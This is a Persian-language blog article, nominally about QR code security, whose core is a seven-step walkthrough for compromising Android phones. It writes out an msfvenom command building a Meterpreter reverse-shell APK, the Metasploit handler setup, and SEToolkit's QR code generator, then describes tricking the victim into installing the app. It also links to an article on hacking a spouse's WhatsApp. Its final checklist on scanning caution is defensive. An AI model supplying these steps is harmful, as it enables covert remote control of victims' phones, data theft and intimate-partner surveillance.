هک بارکد برای هک واتساپ و نرم افزار های دیگر+ 7 مرحله برای هک کد QR 🟢

هک بارکد مخصوصا در واتساپ می تواند به هکر ها کمک کند که به اطلاعات شما دسترسی پیدا کند. در این مقاله می خواهیم به طور مفصل در مورد هک بارکد روی گوشی های اندرویدی صحبت کنیم. با استفاده از یک سری بارکد هایی که در گوشی های اندرویدی وجود دارد شما می توانید ایین گوشی ها را هک کنید. هر چند که ممکن است کمی برای شما گیج کننده باشد. اما در صورتی که کمی با دنیای تکنولوژی آشنا باشید می توانید این روش ها را به کار بگیرید. البته پیشنهاد می کنیم که این مقاله را برای جلوگیری از هک شدن با استفاده از بارکد بخوانید. نه برای هک کردن !

هک بارکد

من می خواهم این مقاله را با یک سلب مسئولیت شروع کنم: روشی که می خواهم توضیح دهم یکی از چندین روش است. کاملاً خودکار نیست، به این معنی که هدف هک هم نقشی را ایفا خواهد کرد. در نتیجه، مهندسی اجتماعی یک جزء حیاتی است. مهندسی اجتماعی عمل فریب دادن کسی به انجام عمل یا افشای اطلاعات، بهره‌گیری از تمایلات طبیعی و واکنش‌های احساسی قربانی است. علاوه بر این، این روش ممکن است در هر دستگاه اندرویدی کار نکند. تنظیمات امنیتی، وجود آنتی ویروس ها و مکانیسم های ایمنی گوگل تنها تعدادی از موانع احتمالی حمله موفقیت آمیز هستند.

📚📚📚 بیشتر بخوانید : 👈👈👈 کد فهمیدن هک شدن گوشی 👉👉👉 ، از کجا بفهمیم گوشی ما هک شده ؟

کد QR چیست؟

این کد پاسخ سریع یا کد QR در سال 1994 توسط شرکت ژاپنی Denso Wave که محصولات شناسایی خودکار، ربات های صنعتی و کنترل کننده های منطقی قابل برنامه ریزی تولید می کند، اختراع شد. کد یک فرمت داده قابل خواندن توسط ماشین است. برای ردیابی وسایل نقلیه در حین ساخت اختراع شد و برای اسکن قطعات با سرعت بالا طراحی شد. یک کد QR از چندین مربع و نقطه سیاه تشکیل شده است که نشان دهنده قطعات خاصی از اطلاعات است. هنگامی که یک دستگاه کد را اسکن می کند، داده ها را به اطلاعات قابل خواندن برای انسان ترجمه می کند.

امروزه کدهای QR در صنایع مختلف و برای کاربردهای متعددی مانند اهداف ردیابی و برچسب‌گذاری موبایل استفاده می‌شوند که عمل ایجاد عناصر بصری قابل تشخیص توسط گوشی‌های هوشمند و دستگاه‌های مرتبط است. از این کدها می توان برای نوشتن پیام، باز کردن یک شناسه منبع یکنواخت (URI)، نمایش اطلاعات به کاربر و غیره استفاده کرد. به عنوان مثال، در چین، کدهای QR بسیار محبوب هستند: کاربران وی چت می توانند دوربین خود را به سمت مربع نقطه چین قرار دهند تا اطلاعات تماس را مبادله کنند. با برندها و افراد مشهور تعامل کنند، لباس و غذا بخرند، به وب دسترسی داشته باشند و غیره.

نسخه های نماد کد QR از نسخه 1 تا نسخه 40 متغیر است. هر نسخه دارای تعداد خاصی از ماژول ها یا پیکربندی ماژول است. یک ماژول نقطه های سیاه و سفیدی است که کد را ایجاد می کند. یک پیکربندی تعداد ماژول های موجود در یک نماد است که نسخه 1 دارای 21 × 21 ماژول تا نسخه 40 با 177 × 177 ماژول است. نسخه ها چهار ماژول اضافی در هر طرف افزایش می دهند. کدهای QR استاندارد می توانند تا 3 کیلوبایت داده را در خود نگه دارند.

نحوه تشخیص بارکد ها

چالش برانگیزترین مشکل برای تیم توسعه کد QR این بود که چگونه کدهای دو بعدی را با بیشترین سرعت ممکن بخوانند. تشخیص مکان کد دو بعدی برای اسکنرها دشوارتر از بارکد است. یک روز، هارا به این فکر افتاد که اطلاعاتی را به کد اضافه کند که مکان آن را نشان می دهد، که ممکن است این مشکل را حل کند.

بر اساس این ایده، یک الگوی تشخیص موقعیت، واقع در سه گوشه هر کد، ایجاد شد. او انتظار داشت که با گنجاندن این الگو در یک کد دوبعدی، یک اسکنر بتواند کد را به دقت تشخیص دهد و در نتیجه آن را با سرعت بالا بخواند.

با این حال، توسعه شکل الگوی تشخیص موقعیت بسیار دشوار بود زیرا زمانی که یک شکل مشابه در نزدیکی کد قرار داشت، الگوی به طور دقیق تشخیص داده نمی شد. برای جلوگیری از تشخیص نادرست، الگوی تشخیص موقعیت باید شکل منحصر به فردی داشته باشد.

اعضای تیم توسعه یک بررسی جامع از نسبت نواحی سفید به سیاه در تصاویر و کاراکترهای چاپ شده بر روی برگه ها، مجلات، کارتن های راه راه و سایر اسناد را پس از کاهش آنها به الگوهایی با مناطق سیاه و سفید آغاز کردند. آنها به مطالعه تعداد زیادی از مواد چاپی در روز و شب ادامه دادند و در نهایت نسبتی را که کمترین مقدار را روی مواد چاپی دیده می شد شناسایی کردند. 1:1:3:1:1 بود. به این ترتیب، پهنای نواحی سیاه و سفید در الگوی تشخیص موقعیت مشخص شد و اسکنرها با یافتن این نسبت منحصر به فرد قادر به تشخیص کد بدون توجه به زاویه اسکن شدند.

بیشتر بخوانید 🚀🚀🚀🚀» پاکسازی گوشی

آیا کدهای QR ایمن هستند؟

مهاجمان می توانند URL های مخرب حاوی بدافزار سفارشی را در یک کد QR جاسازی کنند که پس از اسکن می تواند داده ها را از دستگاه تلفن همراه استخراج کند. همچنین امکان جاسازی یک URL مخرب در یک کد QR وجود دارد که به یک سایت فیشینگ هدایت می شود، جایی که کاربران ناآگاه می توانند اطلاعات شخصی یا مالی را فاش کنند. از آنجایی که انسان ها نمی توانند کدهای QR را بخوانند، برای مهاجمان آسان است که یک کد QR را تغییر دهند تا به منبع دیگری اشاره کنند بدون اینکه شناسایی شوند.

هک بارکد به عنوان یکی از خطراتی است که احتمالا در آینده بیشتر شاهد آن باشیم

آیا کدهای QR قابل هک هستند؟

خود کدهای QR نمی توانند هک شوند . پس هک بارکد به روش غیر مستقیم انجام می شود. خطرات امنیتی مرتبط با کدهای QR به جای خود کدها از مقصد کدهای QR ناشی می شود. هکرها می‌توانند کدهای QR مخربی ایجاد کنند که کاربران را به وب‌سایت‌های جعلی ارسال می‌کند که داده‌های شخصی آنها مانند اعتبار ورود به سیستم را ضبط می‌کند یا حتی موقعیت جغرافیایی آنها را در تلفن‌هایشان ردیابی می‌کند. به همین دلیل است که کاربران تلفن همراه باید فقط کدهایی را اسکن کنند که از یک فرستنده قابل اعتماد می آیند.

بیشتر بخوانید 🚀🚀🚀🚀» اندروید باکس

سناریو

در این سناریو، عامل تهدید می‌خواهد به گوشی هوشمند هدف خود دسترسی پیدا کند. پس از جمع آوری دقیق اطلاعات، او متوجه می شود که هدف از یک دستگاه اندرویدی استفاده می کند. در میان چندین روش موجود، او تصمیم می گیرد حمله خود را از طریق کد QR انجام دهد. عامل تهدید از کالی لینوکس به عنوان سیستم عامل (OS) خود استفاده خواهد کرد و از قابلیت های Metasploit و ابزار مهندسی اجتماعی (SET) استفاده خواهد کرد.

مرحله 1

اولین گام استفاده از msfvenom برای آماده سازی بار است، کدی که به عامل تهدید اجازه می دهد تا به دستگاه هدف دسترسی پیدا کند.

ترمینال را باز کنید و عبارت زیر را تایپ کنید:

“msfvenom -p android/meterpreter/reverse_tcp lhost=youripaddress lport=4444 r >/var/www/html/test.apk”

Lhost (میزبان محلی) IP را نشان می دهد که payload از آن برای اتصال مجدد به ماشین عامل تهدید استفاده می کند. به عنوان مثال، اگر دستگاه و تلفن هوشمند به یک Wi-Fi متصل هستند، IP را می توان با تایپ کردن “ifconfig” در ترمینال و بررسی “inet” (آدرس اینترنت) کارت Wi-Fi پیدا کرد. اگر گوشی هوشمند از داده تلفن همراه استفاده می کند یا به روتر دیگری متصل است، عامل تهدید باید از IP عمومی دستگاه خود استفاده کند. با مراجعه به whatismyipaddress.com می توانید آن را پیدا کنید.

گام 2

در ترمینال، «service apache2 start» را تایپ کرده و [Enter] را فشار دهید. اکنون زمان راه اندازی Metasploit است. برای اجرای صحیح این ابزار، چند مرحله وجود دارد که باید طی شود. ابتدا “service postgresql start” را تایپ کرده و [Enter] را فشار دهید. سپس دستور msfdb init را اجرا کنید. در نهایت، msfconsole را برای راه اندازی ابزار اجرا کنید.

مرحله 3

“use exploit/multi/handler” را تایپ کرده و [Enter] را فشار دهید. سپس «set payload android/meterpreter/reverse_tcp» را تایپ کرده و [Enter] را فشار دهید. اکنون «show options» را تایپ کنید تا اطلاعات مورد نیاز برای اجرای حمله را ببینید.

همانطور که از اسکرین شات می بینید، LHOST باید ارائه شود. همانطور که گفته شد LHOST آدرس IP مورد استفاده عامل تهدید است. برای ارائه اطلاعات، عبارت “set lhost” و سپس آدرس IP خود را تایپ کنید. قالب “تنظیم [فضای] lhost [فضای] آدرس شما” است. به عنوان ورودی نهایی، “exploit” را تایپ کرده و [Enter] را فشار دهید. به یاد داشته باشید، ترمینال را نبندید. در غیر این صورت هک بارکد انجام نمی شود.

هک بارکد می تواند با تغییر دادن و ایجاد بارکد های جعلی انجام شود

مرحله 4

ترمینال دیگری را باز کنید، “setoolkit” را تایپ کنید و [Enter] را فشار دهید.

“1” را تایپ کنید (برای انتخاب “Social-Engineering Attacks”) و [Enter] را فشار دهید.

سپس، “8” را تایپ کنید (برای انتخاب “QRCode Generator Attack Vector”) و [Enter] را فشار دهید. در صورت درخواست، آدرس IP را که قبلاً استفاده می کردید، به دنبال آن “/” و بارگذاری، در این مورد “test.apk” تایپ کنید. قالب به شرح زیر است:

“youripaddress/nameofthepayload.apk”.

مرحله 5

از SEToolkit خارج شده و “cd /root/.set/reports” را تایپ کنید تا پوشه ای را که کد QR در آن ذخیره شده است پیدا کنید. در این مرحله، عامل تهدید باید از مهندسی اجتماعی استفاده کند تا هدف را متقاعد کند که کد را اسکن کند.

مرحله 6

هدف کد QR را اسکن می کند

. او درخواستی برای دانلود اپلیکیشن دریافت می کند.

او متقاعد شده است که برنامه مورد نیاز خود را دانلود می کند. بنابراین مراحل را طی کرده و اپلیکیشن را با موفقیت نصب می کند.

مرحله 7

لحظه ای که برنامه بر روی دستگاه هدف نصب می شود، عامل تهدید متوجه می شود که اکنون یک جلسه مترپرتر باز است. تایپ کردن “sysinfo” به او اجازه می دهد تا بررسی کند که آیا عملیات موفقیت آمیز بوده است یا خیر. پس از تایید نتایج مثبت، او “کمک” را تایپ می کند تا دستورات زیادی را که می توان اجرا کرد تجسم کرد.

موانع شناخته شده برای هک بارکد

چند مانع وجود دارد که باید برطرف شود. مهندسی اجتماعی در نیمه راه بین یک مهارت و یک هنر است. آسان نیست، اما بسته به شرایط، هر کسی را می توان فریب داد. خستگی، عجله، کسالت، عصبانیت، احساسات و حالات ذهنی متعددی وجود دارد که می توان از آنها سوء استفاده کرد. با این حال، چالش های فنی نیز وجود دارد که ممکن است نتیجه حمله را به خطر بیندازد.

اول، همه اسکنرهای QR مستقیماً پیوند را جستجو نمی کنند. من از چهار اسکنر استفاده کردم و دو تای آنها به جای جستجوی مستقیم لینک را در گوگل جستجو کردند. دوم، مکانیسم های امنیتی ممکن است روند را مختل کند. اگر هدف اجازه نصب برنامه‌ها از منابع ناشناس را ندهد، فایل دانلود نمی‌شود. علاوه بر این، هنگام نصب، Play Protect دو بار در مورد اقداماتم به من هشدار داد. این اتفاق می افتد که کاربران بدون خواندن به ضربه زدن ادامه می دهند تا اعلان ها از بین بروند، اما یک کاربر منطقی تر ممکن است دوباره به دانلود فایل فکر کند. علاوه بر این، قبل از نصب برنامه، لیستی از مجوزها نمایش داده می شود و کاربر ممکن است از خود بپرسد که چرا برنامه نیاز به دسترسی تقریباً به همه چیز دارد.

سوم، نام. همانطور که از اسکرین شات ها می بینید، “MainActivity” به احتمال زیاد به اکثر کاربران هشدار می دهد. علاوه بر این، این برنامه به وضوح با یک برنامه “کلاسیک” متفاوت است.

به هیچ عنوان تصویر بارکد خودتان را برای کسی ارسال نکنید

بیشتر بخوانید 🚀🚀🚀🚀» هک واتساپ همسر

نتیجه

در حالی که روش‌هایی برای اجتناب از موانعی که فهرست کردم وجود دارد، این احتمال وجود دارد که کاربر برنامه را دانلود یا نصب نکند. در این صورت هک بارکد انجام نمی شود. اگر چندین هشدار به او درباره فعالیت مشکوک هشدار دهد. موقعیتی که عامل تهدید حتی برای مدت کوتاهی به گوشی هوشمند هدف دسترسی داشته باشد، ممکن است فرصت عالی برای دانلود فایل مخرب باشد. چند ثانیه طول می کشد و هنگامی که برنامه نصب می شود، عامل تهدید می تواند آن را در یک فهرست غیرمعمول، احتمالاً پنهان، پنهان کند. لحظه ای که جلسه مترپرتر باز می شود، عامل تهدید می تواند از دستگاه بیشتر سوء استفاده کند، از جمله ارسال همان کد QR برای سایر کاربران از طریق دستگاه هدف.

همانطور که نشان داده شد، کدهای QR می توانند به عنوان یک بردار برای به خطر انداختن دستگاه شما استفاده شوند. روشی که توضیح دادم به هدف نیاز دارد که فایل مخرب را به صورت دستی دانلود کند، اما بسیاری از اکسپلویت های دیگر خودکار و مخفی هستند و نیازی به اقدامات بعدی پس از اسکن کد ندارند. مراقب آنچه اسکن می کنید باشید. حتی یک کد QR به ظاهر بی‌گناه می‌تواند منجر به پیامد مضری شود. هنگامی که یک کد را اسکن می کنید، به دقت به موارد زیر فکر کنید:

1. ضرورت. آیا واقعا باید این کد را اسکن کنم؟ یا من فقط کنجکاو هستم؟

2. نیاز به استفاده از کد QR. آیا روش های دیگری برای دانلود وجود دارد؟ آیا منبع کد QR یک منبع معتبر است؟

3. مجوزها. برنامه از من چند مجوز می خواهد؟ آیا منطقی است که چنین اپلیکیشنی درخواست دسترسی به این منابع را بدهد؟

4. هشدارهای امنیتی. اگر هشداری دیدید، توقف کنید و بخوانید. به یاد داشته باشید، عجله باعث اتلاف می شود.